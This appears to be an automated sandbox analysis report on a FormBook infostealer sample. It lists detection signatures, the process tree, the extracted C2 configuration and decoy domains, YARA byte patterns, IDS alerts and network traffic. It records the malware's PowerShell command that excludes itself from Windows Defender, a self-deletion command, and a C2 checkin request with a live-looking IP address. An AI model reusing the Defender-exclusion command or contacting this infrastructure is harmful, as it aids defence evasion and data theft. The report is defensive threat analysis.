Windows Analysis Report
JHnNxt6Pnb.exe

Overview

General Information

Sample name: JHnNxt6Pnb.exe
renamed because original name is a hash value
Original sample name: a6d2a47171f9630a8db62eb4001e196dfbad94cf40638e108cc649883d1bc069.exe
Analysis ID: 1569252
MD5: b631685c5ef9ee26ded25c76ab3eda27
SHA1: 03696b36c4838440cf8def9687117745c9edbd19
SHA256: a6d2a47171f9630a8db62eb4001e196dfbad94cf40638e108cc649883d1bc069
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Reads the DNS cache
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Uses ipconfig to lookup or modify the Windows network settings
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • JHnNxt6Pnb.exe (PID: 6796 cmdline: "C:\Users\user\Desktop\JHnNxt6Pnb.exe" MD5: B631685C5EF9EE26DED25C76AB3EDA27)
    • powershell.exe (PID: 916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4432 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • JHnNxt6Pnb.exe (PID: 964 cmdline: "C:\Users\user\Desktop\JHnNxt6Pnb.exe" MD5: B631685C5EF9EE26DED25C76AB3EDA27)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autoconv.exe (PID: 5956 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)
        • ipconfig.exe (PID: 5460 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • cmd.exe (PID: 6636 cmdline: /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.f6b-crxy.top/cu29/"], "decoy": ["qidr.shop", "usinessaviationconsulting.net", "68716329.xyz", "nd-los.net", "ealthironcladguarantee.shop", "oftware-download-69354.bond", "48372305.top", "omeownershub.top", "mall-chilli.top", "ajakgoid.online", "ire-changer-53482.bond", "rugsrx.shop", "oyang123.info", "azino-forum-pro.online", "817715.rest", "layman.vip", "eb777.club", "ovatonica.net", "urgaslotvip.website", "inn-paaaa.buzz", "reativedreams.design", "upremehomes.shop", "ames-saaab.buzz", "phonelock.xyz", "ideandseekvacations.xyz", "77179ksuhr.top", "ental-bridges-87553.bond", "7win2.bet", "ainan.company", "5mwhs.top", "hopp9.top", "65fhgejd3.xyz", "olandopaintingllc.online", "n-wee.buzz", "reshcasinoinfo2.top", "5734.party", "qtbyj.live", "gil.lat", "siabgc4d.online", "fios.top", "sed-cars-89003.bond", "nlineschools-2507-001-sap.click", "upiloffatemotors.online", "ordf.top", "achhonglan.shop", "irex.info", "oursmile.vip", "leachlondonstore.online", "asukacro.online", "panish-classes-64045.bond", "apita.top", "srtio.xyz", "kdsclci.bond", "ochacha.sbs", "oldsteps.buzz", "yzq0n.top", "npostl.xyz", "ladder-cancer-symptoms-mine.sbs", "400725iimfyuj120.top", "3589.photo", "rasilhojenoticias.online", "ependableequipment.online", "itusbandar126.info", "ohns.app"]}
Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown | Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com | Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group | Strings:
  • 0x18809:$sqlite3step: 68 34 1C 7B E1
  • 0x1891c:$sqlite3step: 68 34 1C 7B E1
  • 0x18838:$sqlite3text: 68 38 2A 90 C5
  • 0x1895d:$sqlite3text: 68 38 2A 90 C5
  • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown | Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com | Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ParentImage: C:\Users\user\Desktop\JHnNxt6Pnb.exe, ParentProcessId: 6796, ParentProcessName: JHnNxt6Pnb.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ProcessId: 916, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ParentImage: C:\Users\user\Desktop\JHnNxt6Pnb.exe, ParentProcessId: 6796, ParentProcessName: JHnNxt6Pnb.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ProcessId: 916, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ParentImage: C:\Users\user\Desktop\JHnNxt6Pnb.exe, ParentProcessId: 6796, ParentProcessName: JHnNxt6Pnb.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ProcessId: 916, ProcessName: powershell.exe
Timestamp: 2024-12-05T16:50:25.171196+0100 | SID: 2031453 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.8 | Source Port: 49716 | Destination IP: 85.13.166.18 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: JHnNxt6Pnb.exe | Avira: detected
Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.f6b-crxy.top/cu29/"], "decoy": ["qidr.shop", "usinessaviationconsulting.net", "68716329.xyz", "nd-los.net", "ealthironcladguarantee.shop", "oftware-download-69354.bond", "48372305.top", "omeownershub.top", "mall-chilli.top", "ajakgoid.online", "ire-changer-53482.bond", "rugsrx.shop", "oyang123.info", "azino-forum-pro.online", "817715.rest", "layman.vip", "eb777.club", "ovatonica.net", "urgaslotvip.website", "inn-paaaa.buzz", "reativedreams.design", "upremehomes.shop", "ames-saaab.buzz", "phonelock.xyz", "ideandseekvacations.xyz", "77179ksuhr.top", "ental-bridges-87553.bond", "7win2.bet", "ainan.company", "5mwhs.top", "hopp9.top", "65fhgejd3.xyz", "olandopaintingllc.online", "n-wee.buzz", "reshcasinoinfo2.top", "5734.party", "qtbyj.live", "gil.lat", "siabgc4d.online", "fios.top", "sed-cars-89003.bond", "nlineschools-2507-001-sap.click", "upiloffatemotors.online", "ordf.top", "achhonglan.shop", "irex.info", "oursmile.vip", "leachlondonstore.online", "asukacro.online", "panish-classes-64045.bond", "apita.top", "srtio.xyz", "kdsclci.bond", "ochacha.sbs", "oldsteps.buzz", "yzq0n.top", "npostl.xyz", "ladder-cancer-symptoms-mine.sbs", "400725iimfyuj120.top", "3589.photo", "rasilhojenoticias.online", "ependableequipment.online", "itusbandar126.info", "ohns.app"]}
Source: JHnNxt6Pnb.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: JHnNxt6Pnb.exe | Joe Sandbox ML: detected
Source: JHnNxt6Pnb.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: JHnNxt6Pnb.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ipconfig.pdb source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001930000.00000040.10000000.00040000.00000000.sdmp, JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: ipconfig.pdbGCTL source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001930000.00000040.10000000.00040000.00000000.sdmp, JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: JHnNxt6Pnb.exe, 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1671675082.000000000367D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1669527051.00000000034C9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: JHnNxt6Pnb.exe, JHnNxt6Pnb.exe, 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1671675082.000000000367D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1669527051.00000000034C9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4x nop then pop ebx | 4_2_00407B22
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop ebx | 9_2_00E37B22

Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49716 -> 85.13.166.18:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49716 -> 85.13.166.18:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49716 -> 85.13.166.18:80
Source: C:\Windows\explorer.exe | Network Connect: 85.13.166.18 80
Source: Malware configuration extractor | URLs: www.f6b-crxy.top/cu29/
Source: DNS query: www.68716329.xyz
Source: unknown | DNS traffic detected: query: www.68716329.xyz replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.apita.top replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.siabgc4d.online replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.48372305.top replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.f6b-crxy.top replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.oldsteps.buzz replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.yzq0n.top replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.77179ksuhr.top replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.azino-forum-pro.online replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.inn-paaaa.buzz replaycode: Name error (3)
Source: global traffic | HTTP traffic detected: GET /cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP HTTP/1.1 Host: www.irex.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | ASN Name: NMM-ASD-02742FriedersdorfHauptstrasse68DE
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe | Code function: 6_2_115DDF82 getaddrinfo,setsockopt,recv, | 6_2_115DDF82
Source: global traffic | DNS traffic detected: DNS query: www.inn-paaaa.buzz
Source: global traffic | DNS traffic detected: DNS query: www.irex.info
Source: global traffic | DNS traffic detected: DNS query: www.yzq0n.top
Source: global traffic | DNS traffic detected: DNS query: www.siabgc4d.online
Source: global traffic | DNS traffic detected: DNS query: www.48372305.top
Source: global traffic | DNS traffic detected: DNS query: www.77179ksuhr.top
Source: global traffic | DNS traffic detected: DNS query: www.f6b-crxy.top
Source: global traffic | DNS traffic detected: DNS query: www.azino-forum-pro.online
Source: global traffic | DNS traffic detected: DNS query: www.68716329.xyz
Source: global traffic | DNS traffic detected: DNS query: www.apita.top
Source: global traffic | DNS traffic detected: DNS query: www.oldsteps.buzz
Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ccert.coml07
Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076441838.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009237000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000006.00000002.4002256173.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1545593009.0000000004405000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000002.4004189778.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4004218342.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4001297704.0000000002C80000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: JHnNxt6Pnb.exe, 00000000.00000002.1539683468.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.48372305.top
Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.48372305.top/cu29/
Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.48372305.top/cu29/www.77179ksuhr.top
Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.48372305.topReferer:
Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.5mwhs.top
Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.5mwhs.top/cu29/
Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.5mwhs.top/cu29/www.layman.vip
